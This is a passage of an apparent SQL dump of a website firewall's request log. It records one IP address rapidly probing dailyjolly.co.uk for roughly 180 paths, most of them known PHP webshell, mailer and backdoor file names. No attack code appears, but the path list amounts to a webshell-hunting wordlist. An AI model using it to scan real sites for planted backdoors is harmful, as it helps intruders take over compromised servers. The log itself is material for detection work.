|dailyjolly.co.uk/7yn.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319448.1270,100,'3mDRw0z6YNMA8jS1JWBkFXea','','13|0|0|0|dailyjolly.co.uk/haxor.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319453.9095,100,'ZEbyGDadiCnPTIOFugUWsBJj','','13|0|0|0|dailyjolly.co.uk/13.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319456.5589,100,'5z60xwrSBc2XDdpThVFHel13','','13|0|0|0|dailyjolly.co.uk/e.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319459.3580,100,'X7wNlat5mpeETGr2SMz8sx1u','','13|0|0|0|dailyjolly.co.uk/r.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319461.6504,100,'mfFTXv6nWZoIy2akVE5cQxBC','','13|0|0|0|dailyjolly.co.uk/t.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319463.3109,100,'1P6MXoLiGdF8ky2qBDHaRVZh','','13|0|0|0|dailyjolly.co.uk/y.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319466.7678,100,'C3TYwmMuZb8AktEpvfc6RNxh','','13|0|0|0|dailyjolly.co.uk/u.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319469.3285,100,'ezJEuZcGFiSXhb3Cl7KDOTNf','','13|0|0|0|dailyjolly.co.uk/i.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319471.8911,100,'NlIFfaYOd6bpjhmw9UnkAzV2','','13|0|0|0|dailyjolly.co.uk/p.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319474.8226,100,'zNVj1F87p9iGfeCAqw42MXho','','13|0|0|0|dailyjolly.co.uk/q.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319476.4345,100,'OyPM9s4fNE3Ctz8I1ZG2lYap','','13|0|0|0|dailyjolly.co.uk/s.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319480.2894,100,'WJYCi6rB5Klj47mdakcEVNoR','','13|0|0|0|dailyjolly.co.uk/d.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319482.9070,100,'M4giCTw9sSBbLuqzfF2O1oGl','','13|0|0|0|dailyjolly.co.uk/h.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319484.6072,100,'NmYZtJGj1eBkCrRHXyoFWhQP','','13|0|0|0|dailyjolly.co.uk/j.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319486.8674,100,'nyDqobahp2l8CSQkLgIMYZf1','','13|0|0|0|dailyjolly.co.uk/k.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319488.6702,100,'hMYlnJtp5FOL1VgB0EySPbsa','','13|0|0|0|dailyjolly.co.uk/l.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319490.8318,100,'jdIGvTDos1eZX45VJ70MNyEm','','13|0|0|0|dailyjolly.co.uk/n.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319492.6011,100,'cf8bCBdAnah7louWN4U1MKeH','','13|0|0|0|dailyjolly.co.uk/xindex.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319495.0086,100,'e0E5iTSAjXZ8qduQG2hLnkJU','','13|0|0|0|dailyjolly.co.uk/kindex.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319497.7789,100,'L8fGl73NYeoXkOhMr2zmEiua','','13|0|0|0|dailyjolly.co.uk/FoxWSOv1.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319505.6100,100,'XaECswl6Mbit103ShG7OJIQv','','13|0|0|0|dailyjolly.co.uk/alf.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319508.1701,100,'laMotif7hsubWxjEkV5rI9DZ','','13|0|0|0|dailyjolly.co.uk/bb.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319509.7186,100,'LoXedjmAQGvkJFTVy4zU5cb8','','13|0|0|0|dailyjolly.co.uk/lf.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319515.4218,100,'CQn6WzENaJjylm7rpRfIk9Ks','','13|0|0|0|dailyjolly.co.uk/WSO.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319517.5390,100,'vzIiVe0Y2GEsPXp5rSKyZfO9','','13|0|0|0|dailyjolly.co.uk/xxx.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319520.6325,100,'0IMxHNJQtgPpnrmO6Kdo9ZFV','','13|0|0|0|dailyjolly.co.uk/hello.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319524.5289,100,'SQwYmpJxaseFILkOfRdrDz9T','','13|0|0|0|dailyjolly.co.uk/ok.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319528.4525,100,'GkvRBU7ZtnH34YfOWAXNbxiE','','13|0|0|0|dailyjolly.co.uk/if.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319531.5150,100,'9KF2pOTcJoz3XDGesVPU6WEb','','13|0|0|0|dailyjolly.co.uk/kk.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319533.5492,100,'ahGTyDrz5Uq3gNnEJjKOpBPF','','13|0|0|0|dailyjolly.co.uk/mrjn.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319535.6792,100,'Eqs9IRVOgwPSjTQ4JF6GciHA','','13|0|0|0|dailyjolly.co.uk/kn.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319539.0966,100,'V1KXegnQTN9xAGalF0z3Lc2b','','13|0|0|0|dailyjolly.co.uk/3301.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319541.8643,100,'LATNIS2svb8xl1cohPjni7VZ','','13|0|0|0|dailyjolly.co.uk/leaf.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319543.7317,100,'FYwHiaPC5W0IcROE4guAj1Gd','','13|0|0|0|dailyjolly.co.uk/alex.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319545.7099,100,'f5dFTkMwReQCxv7miqEDylrB','','13|0|0|0|dailyjolly.co.uk/mailer.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319549.2595,100,'sQWr9FJ4NG38qdh5wATSUByP','','13|0|0|0|dailyjolly.co.uk/anone.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319553.2022,100,'m8AzsSekBMETwWxHyd7cn0U3','','13|0|0|0|dailyjolly.co.uk/wp-configer.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319556.0695,100,'JnSO7iRaMd4yUvPo5CEzGsYx','','13|0|0|0|dailyjolly.co.uk/wp-ad.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319559.0032,100,'4KBZC6z0cWjuqedbxX5F3U9y','','13|0|0|0|dailyjolly.co.uk/send.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319564.5028,100,'vCmdQjFyJI9zxXtbfOauAWE6','','13|0|0|0|dailyjolly.co.uk/3.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319570.6529,100,'Cgxl3hZmNAIG2vEX5cKR1wJi','','13|0|0|0|dailyjolly.co.uk/.wp-cache.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319573.0125,100,'m5EZux4bNwcMGILOa6SkCDFv','','13|0|0|0|dailyjolly.co.uk/sendmail.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319574.7535,100,'5PfCIJzs16Xam3qvD7eHE4nr','','13|0|0|0|dailyjolly.co.uk/rahma.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319577.1038,100,'CDeOJoxfQnFV8MAGEmzk1Lvc','','13|0|0|0|dailyjolly.co.uk/nasgor.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319581.3911,100,'EzVxfTnt5IQcKhC8SjRyop3O','','13|0|0|0|dailyjolly.co.uk/wp-confirm.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319583.2518,100,'XSu0nlPBjexps7qLRJwm2hEv','','13|0|0|0|dailyjolly.co.uk/alfa123.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319586.8058,100,'AsUIlqxj4hJ1O6wcTW7CMpVn','','13|0|0|0|dailyjolly.co.uk/upload.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319591.1792,100,'ZbxrO6Y4dciB1S0I8wJgeqpK','','13|0|0|0|dailyjolly.co.uk/bypass.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319593.0513,100,'GPFdJp9zhbsRIgD3CcYtSZu7','','13|0|0|0|dailyjolly.co.uk/wp-one.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319594.6228,100,'eukjvf4IpWNbihwaHZGdB9E5','','13|0|0|0|dailyjolly.co.uk/alexus.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319596.7343,100,'cAbmrY5yh3a9GlSN6Ev8WeUX','','13|0|0|0|dailyjolly.co.uk/wso1337.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319598.8945,100,'dsIByj24tRai79mQxFzXqUJS','','13|0|0|0|dailyjolly.co.uk/1337.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319600.3836,100,'AVqzXctsvgnR5DMNGZ7wPO8k','','13|0|0|0|dailyjolly.co.uk/blog.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319603.2423,100,'ETK39CLSOGntWrs1HzAJQdPw','','13|0|0|0|dailyjolly.co.uk/it.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319605.8251,100,'lJ9hako7btL84QP0gO62UfTi','','13|0|0|0|dailyjolly.co.uk/kiss.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319608.7676,100,'VSRKQ2imt0lxgJCnFEbTA4M3','','13|0|0|0|dailyjolly.co.uk/0.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319610.8309,100,'KaEi8gWCSszXjd4TVRMUBG0O','','13|0|0|0|dailyjolly.co.uk/wp2.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319613.2130,100,'POiMfAv3gxE8aqhWU9yNdc2u','','13|0|0|0|dailyjolly.co.uk/owl.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319615.6959,100,'6PaxrtLDdfBJ5YRzcEWSZvyQ','','13|0|0|0|dailyjolly.co.uk/vuln.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319617.7842,100,'bvxVyzOZprs9WDo4IN60GUBL','','13|0|0|0|dailyjolly.co.uk/ohayo.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319619.3921,100,'b71ijoBHsVl6LFkMO3uz0g9Q','','13|0|0|0|dailyjolly.co.uk/wp-admin.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319621.4117,100,'1IiVXvtCZKx7p9qR8Q6NzUOG','','13|0|0|0|dailyjolly.co.uk/cms.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319625.1313,100,'KfiVnebHU8I5ZQNM7j2FhkD3','','13|0|0|0|dailyjolly.co.uk/wp-uploads.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319627.3990,100,'RiOQhqlvmuVfbGNsB1kgtpjZ','','13|0|0|0|dailyjolly.co.uk/Gel.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319630.1603,100,'dg8zMarqZB2tpNFm03cxXYu9','','13|0|0|0|dailyjolly.co.uk/41.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319631.6677,100,'oLOE35RIDAHhBfzFXNSngyqr','','13|0|0|0|dailyjolly.co.uk/4price.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319633.1424,100,'DF0civYdAwVRNHU61zCkaPrM','','13|0|0|0|dailyjolly.co.uk/MARIJUANA.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319636.7842,100,'AWHpRNObLkgdqPtuFK475QED','','13|0|0|0|dailyjolly.co.uk/.fk.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319638.4366,100,'IrZHDa4q2mSxzFgJTRdNiy68','','13|0|0|0|dailyjolly.co.uk/XxX.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319640.3758,100,'RI45H2VsTyK1rGbk3mqPECu8','','13|0|0|0|dailyjolly.co.uk/alexuse.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319641.8937,100,'QO7SAjCTdBUNwh1s5buGqz3e','','13|0|0|0|dailyjolly.co.uk/Sendemail.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319643.7008,100,'2aZ6BIpf0xvHrWJRhUg5stC1','','13|0|0|0|dailyjolly.co.uk/content.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319645.2245,100,'UXPQGWYSEirtOTpAef6kJv45','','13|0|0|0|dailyjolly.co.uk/leafmailer2.8.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319647.0629,100,'7g8R0UIsO1dcQtk63aCSvEeG','','13|0|0|0|dailyjolly.co.uk/olu.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319649.3402,100,'8PjaVeqx2OvGHBl5iW3Q9X6T','','13|0|0|0|dailyjolly.co.uk/alexusmailer%202.0.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319651.3309,100,'G5Ewd2YBck47OgnPLIy9MupF','','13|0|0|0|dailyjolly.co.uk/rss.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319654.1180,100,'12ZXqHwnaIVCvAO7shYtQlpi','','13|0|0|0|dailyjolly.co.uk/alexus-mailer.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319655.7895,100,'tcL7OyBp9hYWbf6TKa4XDUId','','13|0|0|0|dailyjolly.co.uk/wp-file.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319657.6707,100,'K4HPbj3kaexWsnhCX5DcOJzN','','13|0|0|0|dailyjolly.co.uk/wso2.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319661.0755,100,'4t8yG0ezb1uK53OIjJshFvLg','','13|0|0|0|dailyjolly.co.uk/wso1.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319662.4704,100,'QtW4jkg9L7uTEqaOw0xcZbeR','','13|0|0|0|dailyjolly.co.uk/olux.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319664.6071,100,'Kjp0fPTJt5Fn3wCXqezxLOs8','','13|0|0|0|dailyjolly.co.uk/wp-info.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319665.9740,100,'Z4l0bPfCGzvOVxKjQBTMFrqH','','13|0|0|0|dailyjolly.co.uk/xl.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319668.1272,100,'K1g6olEh0sZx2j79GDbNHpw4','','13|0|0|0|dailyjolly.co.uk/wp-confiig.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319670.3656,100,'PaLWbv4jT1KoqUhiXHgDz37Y','','13|0|0|0|dailyjolly.co.uk/file-manager.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319672.2409,100,'pwgufZdVTcbKC64sqxFyE2Do','','13|0|0|0|dailyjolly.co.uk/uploader.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319675.2792,100,'NLeXWoCYGwJ20Opb6craSzqH','','13|0|0|0|dailyjolly.co.uk/leafmailer.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319676.8879,100,'URuWy2nQBdHqxVaD0ozs1S63','','13|0|0|0|dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674319679.7941,100,'X2E4OQFZrxcSW9iYpGs5zujT','','13|0|0|0|dailyjolly.co.uk/.well-known/ALFA_DATA/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674319683.5053,100,'eVQZhvJ63d9GCEIosMucrmTU','','13|0|0|0|dailyjolly.co.uk/tmp_images/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674319686.2766,100,'x9hCksLbuvZVT7eyqmKptAlU','','13|0|0|0|dailyjolly.co.uk/wp-admin/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674319690.3236,100,'KDU4iQ0oJGlVzn3OWdx1qLXI','','13|0|0|0|dailyjolly.co.uk/wp-content/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674319692.3749,100,'b8t4EMOTWIlRdikeu6N2oChK','','13|0|0|0|dailyjolly.co.uk/wp-includes/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674319694.7584,100,'zDa1ZguU8mtbcopwVv74F6f0','','13|0|0|0|dailyjolly.co.uk/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674319697.7969,100,'9HRm4BitgxwfrKv6Wp7OFUNX','','13|0|0|0|dailyjolly.co.uk/css/ALFA_DATA/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674319699.9269,100,'TigbPsJe6IL58t2OqDAjcxU4','','13|0|0|0|dailyjolly.co.uk/files/ALFA_DATA/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674319701.7218,100,'P35S4Omya1ExVTCG8cfWwkrL','','13|0|0|0|dailyjolly.co.uk/images/ALFA_DATA/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674319704.0384,100,'f3HX4wFGWI8TZlRnctVu5NMD','','13|0|0|0|dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa%22',0,13,0),('216.226.146.228',3638727396,'',0,1674319705.4646,100,'3XGHnkAu27VBSgIqb6QerfOj','','13|0|0|0|dailyjolly.co.uk/wp-admin/ALFA_DATA/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674319708.4516,100,'RCDYL256GnlkmFaQyZehWHig','','13|0|0|0|dailyjolly.co.uk/wp-content/ALFA_DATA/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674319710.6695,100,'M8YXDT3mJuNknFOjU52atAz4','','13|0|0|0|dailyjolly.co.uk/wp-includes/ALFA_DATA/alfacgiapi/perl.alfa',0,13,0),('216.226.146.228',3638727396,'',0,1674319712.6020,100,'X3N9IChFts76fjBumcPYvzlR','','13|0|0|0|dailyjolly.co.uk/date.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319714.1885,100,'JV8ijtckdW7N2l9aPDbrQAzZ','','13|0|0|0|dailyjolly.co.uk/about.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319715.9968,100,'HEdLkap90K6TCyUe5qjroYFi','','13|0|0|0|dailyjolly.co.uk/alfaindex.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319718.2369,100,'WrCg873RExBc2HTNqZpmojId','','13|0|0|0|dailyjolly.co.uk/.alf.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319722.3298,100,'XzDRyNlSJ56uivIqxHpULh3c','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/cekidot/alf.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319724.6861,100,'jwMXrO7bEcvKu5TpJsiIFkQW','','13|0|0|0|dailyjolly.co.uk/wp-content/fw.php%22',0,13,0),('216.226.146.228',3638727396,'',0,1674319726.9569,100,'hcfkY806d1sKGy5qrnCLPHaA','','13|0|0|0|dailyjolly.co.uk/wp-content/alfa.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319728.7796,100,'bfKBrXGyESk4YT8tAjR1DU5V','','13|0|0|0|dailyjolly.co.uk/snd.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319730.3268,100,'wlD7IqJi0QRvb4KseagCjW9p','','13|0|0|0|dailyjolly.co.uk/wp-class.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319732.8320,100,'HCFmMs7g81NubQjTtKr5iJZB','','13|0|0|0|dailyjolly.co.uk/small.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319736.1940,100,'xt4G1eZcSVEPmjRCkazsUd7W','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/upspy/index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319738.6820,100,'V8tb1zFSx3D2eClJQEXdBImL','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/ubh/index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319740.3414,100,'tN9I5SapH02bKqiOP3VodhG4','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319743.4841,100,'KJCtasIPHGMOAXWRLdwkZeV8','','13|0|0|0|dailyjolly.co.uk/wp-content/themes/gaukingo/db.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319747.1946,100,'utiMz4CgdEGA6nbZe29UfTRP','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/three-column-screen-layout/db.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319749.8641,100,'fUZ4gbDi5Luc6s2QSy9v0wJn','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/xichang/x.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319752.2950,100,'PEA3HC70rMc8ewyQUZ1VKuvi','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/html404/index.html',0,13,0),('216.226.146.228',3638727396,'',0,1674319756.0518,100,'ZPsjNAu0xUc42adBVDJEFKTw','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/wp-db-ajax-made/wp-ajax.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319759.5610,100,'BObVMTy3tR9qdPDHQN08rFSU','','13|0|0|0|dailyjolly.co.uk/Marvins.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319761.5325,100,'6volWEZGkALxH7w3XjCPK2Na','','13|0|0|0|dailyjolly.co.uk/wp-includes/css/modules.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319763.5725,100,'slAWzZhkT7qjd903eUYfuaCJ','','13|0|0|0|dailyjolly.co.uk/indoxploit.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319767.1789,100,'wV7iH0jEOhDWavz3xsNf9URZ','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/css-ready-sel/file.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319769.5875,100,'njelZyawUVFdOkcb0goWfuqB','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/css-ready/file.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319772.5947,100,'AEIhXl6Ws3g5dFentBCPiRxQ','','13|0|0|0|dailyjolly.co.uk/wp-content/think.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319774.0484,100,'Hu4Q5gYXwdTrcj9LP2bAofn6','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/html404/xccc.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319775.8524,100,'52m0MEKn3eVxqQBHUdLXuPTz','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/html404/cry.php.pjpeg',0,13,0),('216.226.146.228',3638727396,'',0,1674319779.0324,100,'85geW4xqzu9QCJ1n7LDMGPlA','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/html404/wso25.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319782.7771,100,'p9zD5B2g8RIouwAXsOyqNi1t','','13|0|0|0|dailyjolly.co.uk/modules/mod_simplefileuploadv1.3/elements/udd.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319785.4061,100,'gE3BOTksxzZ18DvVH70p9Xaq','','13|0|0|0|dailyjolly.co.uk/libraries/joomla/css.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319788.3220,100,'7KekubVAgpcDX3ZBwIUoTGsl','','13|0|0|0|dailyjolly.co.uk/libraries/joomla/jmails.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319790.3656,100,'MVs3XYjG0LWT8loS5QgOzpbK','','13|0|0|0|dailyjolly.co.uk/libraries/joomla/jmail.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319793.6398,100,'NnmDKhULiIEXtqkpl5FBHGYb','','13|0|0|0|dailyjolly.co.uk/images/vuln.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319796.3930,100,'pCRHB3os709AYTzmexMaPLOg','','13|0|0|0|dailyjolly.co.uk/tmp/vuln.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319799.1340,100,'6ypRfhOLKIbisudxvwa2Qjkm','','13|0|0|0|dailyjolly.co.uk/rxr.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319803.0863,100,'0QvXMb4BPWZC9ndaIqystwNE','','13|0|0|0|dailyjolly.co.uk/modules/modules/modules.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319806.0280,100,'t3gcn1XzF0298PGjNEwysLUu','','13|0|0|0|dailyjolly.co.uk/error.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319808.8289,100,'RG8b0JITiaFAfxEMWX6twgyk','','13|0|0|0|dailyjolly.co.uk/RxR.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319811.6858,100,'uQa1zAHlMhGFs2fTdYPgc73B','','13|0|0|0|dailyjolly.co.uk/components/com_b2jcontact/izoc.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319813.7410,100,'c5JzgZrusFa96IRBQj3wdvyt','','13|0|0|0|dailyjolly.co.uk/administrator/templates/bluestork/error.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319818.0357,100,'oRamvnxcIKHb1Y4FiUw85ElC','','13|0|0|0|dailyjolly.co.uk/administrator/templates/hathor/index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319820.4815,100,'I4u8fNLEtVj97cOG6omKWMSn','','13|0|0|0|dailyjolly.co.uk/administrator/templates/hathor/error.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319822.8061,100,'2qdILxVNetXm4B3or6WjA18P','','13|0|0|0|dailyjolly.co.uk/administrator/templates/isis/index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319828.5422,100,'j7WfhQdVgJFO4KpEA5zSi1ue','','13|0|0|0|dailyjolly.co.uk/administrator/templates/isis/error.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319832.8142,100,'biQUDHw2ZN6VaGT3dkfL9go8','','13|0|0|0|dailyjolly.co.uk/templates/beez/index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319834.4094,100,'lpbT2CUEginD6OxN5KWRVcFZ','','13|0|0|0|dailyjolly.co.uk/templates/ja_purity/index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319837.0307,100,'zW0c1EeCHTAatXDMNmV94Psf','','13|0|0|0|dailyjolly.co.uk/templates/rhuk_milkyway/index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319840.3012,100,'G2KvaV5EosSw0qY1meHRZPpM','','13|0|0|0|dailyjolly.co.uk/templates/+theme+/index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319843.2205,100,'w4HOdMKTUkb0gtCqpQzmEsZ8','','13|0|0|0|dailyjolly.co.uk/templates/+theme+/error.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319844.8406,100,'YXwrSKyFtcs19qClRM7VkWOJ','','13|0|0|0|dailyjolly.co.uk/templates/beez3/index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319846.3553,100,'lvf8uizbwMEoRPemZOY6U1Dd','','13|0|0|0|dailyjolly.co.uk/templates/beez3/error.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319850.0246,100,'rezPdKZ8Lyb3R92cuXpqVv7S','','13|0|0|0|dailyjolly.co.uk/templates/beez5/index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319854.1427,100,'rDLnVwi8ZFUta3vjRhHul5oG','','13|0|0|0|dailyjolly.co.uk/templates/beez5/error.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319858.5953,100,'lori7GKLpmeq45Vx3bUXfaSg','','13|0|0|0|dailyjolly.co.uk/templates/beez_20/index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319860.7606,100,'3pWoyuNiSPq79x8Tt62d4nQF','','13|0|0|0|dailyjolly.co.uk/templates/beez_20/error.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319864.6058,100,'3qOXthU419eWv8o26sNFPAx7','','13|0|0|0|dailyjolly.co.uk/templates/protostar/index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319865.9560,100,'2nEDe3T8mYAuvO4Z1rRhkzUs','','13|0|0|0|dailyjolly.co.uk/templates/protostar/error.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319869.9459,100,'MDVfm0c74YjON52X9uZCxvgJ','','13|0|0|0|dailyjolly.co.uk/templates/atomic/index.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319871.6408,100,'xo7MraZQpE1T43vH89DVNl56','','13|0|0|0|dailyjolly.co.uk/templates/atomic/error.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319875.4625,100,'QjFGVKlg0T1sJUWAiaStuobc','','13|0|0|0|dailyjolly.co.uk/wp-admin/network/wp-footer.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319878.7711,100,'c6RuhN4F07jpIdLWHGgqfYPS','','13|0|0|0|dailyjolly.co.uk/wp-content/vuln.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319882.0702,100,'A4rwtsB1Smhkid8QGCXRyebF','','13|0|0|0|dailyjolly.co.uk/upel.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319888.1833,100,'ZoP49q0l8fWHX7c1yFxVCTIw','','13|0|0|0|dailyjolly.co.uk/wp-content/uploads/+year+/+month+/',0,13,0),('216.226.146.228',3638727396,'',0,1674319890.4134,100,'v8IClicSd67m1kUnpVxNTwED','','13|0|0|0|dailyjolly.co.uk/license.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319895.6379,100,'HPopmSwd5eMvCjRx97tALFO3','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/ppus/up.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319898.8567,100,'ldcv2iD3sQbSXHyJraxq9GK1','','13|0|0|0|dailyjolly.co.uk/098.php',0,13,0),('216.226.146.228',3638727396,'',0,1674319903.5254,100,'UrjgKYCBhHpMF1qsaO0ebA4w','','13